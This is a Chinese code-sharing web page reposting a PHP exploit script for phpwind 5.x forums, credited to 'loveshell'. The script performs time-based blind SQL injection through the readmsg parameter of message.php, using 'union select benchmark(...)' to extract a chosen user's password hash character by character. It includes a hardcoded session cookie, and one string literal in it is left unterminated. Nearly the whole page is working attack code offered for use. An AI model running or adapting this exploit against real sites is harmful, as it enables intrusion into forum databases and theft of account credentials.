当前位置: 代码网 > it编程>编程语言>安全编程 > phpwind Exp 漏洞利用

phpwind Exp 漏洞利用

2024年05月18日 安全编程 我要评论
忘记什么时候我就拿到了,一直没发挥.由于某些原因一直没发出来,毕竟不是原创,现在有人帖出来了,我也放出来.程序代码 <?php print_r(" +----------------------
忘记什么时候我就拿到了,一直没发挥.由于某些原因一直没发出来,毕竟不是原创,现在有人帖出来了,我也放出来. 
 程序代码
<?php
print_r("

+------------------------------------------------------------------+

exploit for phpwind 5.x version
by  loveshell
just for fun :)

+------------------------------------------------------------------+
");


ini_set("max_execution_time",0);
error_reporting(7);

$bbspath="$argv[2]";
$server="$argv[1]";
$cookie='1ae40_lastfid=0; 1ae40_ol_offset=776; 1ae40_ck_info=%2f%09.72m.net; 1ae40_winduser=a1qkbge9ufxuuwahdlofuamiafxeugimwgfuvvydaa8hbfqnuva%3d; 1ae40_lastvisit=0%091173612527%09%2fbbs%2findex.php%3f;
$useragent="mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; sv1)";
$uid=intval($argv[3])>0 ? intval($argv[3]):1;

echo "\r\n#logging\t........";
if(islogin()) echo "login ok!\r\n";
else die("not login!\tcheck your cookie and useragent!\r\n");


echo "#testing\t........";
if(test()) echo "vul!\r\n";
else die("not vul");


$hashtable='0123456789abcdef';
$count=0;

echo "#cracking\t\r\n\r\n";

for($i=1;$i<=16;$i++){
    echo "第\t$i\t位:";
    $subpass=crack($i+8);
    $password=$password.$subpass;
    echo "$subpass\r\n";
}

echo "password:\t$password";

echo "\r\ngood luck $count times\r\n";


function send($cmd,$path)
{
  global $bbspath,$server,$cookie,$count,$useragent,$debug,$evilip;

  $path=$bbspath."$path";
  $message = "post ".$path." http/1.1\r\n";
  $message .= "accept: */*\r\n";
  $message .= "accept-language: zh-cn\r\n";
  $message .= "referer: http://".$server.$path."\r\n";
  $message .= "content-type: application/x-www-form-urlencoded\r\n";
  $message .= "user-agent: ".$useragent."\r\n";
  $message .= "host: ".$server."\r\n";
  $message .= "content-length: ".strlen($cmd)."\r\n";
  $message .= "connection: keep-alive\r\n";
  $message .= "cookie: ".$cookie."\r\n";
  $message .= "\r\n";
  $message .= $cmd."\r\n";

  $count=$count+1;
  $fd = fsockopen( $server, 80 );
  fputs($fd,$message);
  $resp = "<pre>";
  while($fd&&!feof($fd)) {
  $resp .= fread($fd,1024);
  }
  fclose($fd);
  $resp .="</pre>";
  if($debug) {echo $cmd;echo $resp;}
//  echo $resp;
  return $resp;
}


function sqlject($sql){
    global $uid;
    $data='action=pubmsg&readmsg=0)';
    $data=$data." union select benchmark(1000000,md5(12345)) from pw_members where uid=$uid and $sql".'/*';
    $echo=send($data,'message.php');
    preg_match("/total (.*)\(/i",$echo,$matches);
    if($matches[1]>2) return 1;
    else return 0;
}

function test(){
    global $uid;
    $data='action=pubmsg&readmsg=0)';
    $echo=send($data,'message.php');
    if(strpos($echo,'mysql server error'))    return 1;
    else return 0;
}

function islogin(){
    global $uid;
    $data='action=pubmsg&readmsg=0)';
    $echo=send($data,'message.php');
    if(strpos($echo,'login.php"')) return 0;
    else return 1;
}

function crack($i){
global $hashtable;

$sql="mid(password,$i,1)>0x".bin2hex('8');
if(sqlject($sql)){
    $a=8;
    $b=15;}
else {
    $a=0;
    $b=8;
}


for($tmp=$a;$tmp<=$b;$tmp++){
    $sql="mid(password,$i,1)=0x".bin2hex($hashtable[$tmp]);
    if(sqlject($sql)) return $hashtable[$tmp];
}
crack($i);
}
?>
点击下载此文件
(0)

相关文章:

版权声明:本文内容由互联网用户贡献,该文观点仅代表作者本人。本站仅提供信息存储服务,不拥有所有权,不承担相关法律责任。 如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 2386932994@qq.com 举报,一经查实将立刻删除。

发表评论

验证码:
Copyright © 2017-2025  代码网 保留所有权利. 粤ICP备2024248653号
站长QQ:2386932994 | 联系邮箱:2386932994@qq.com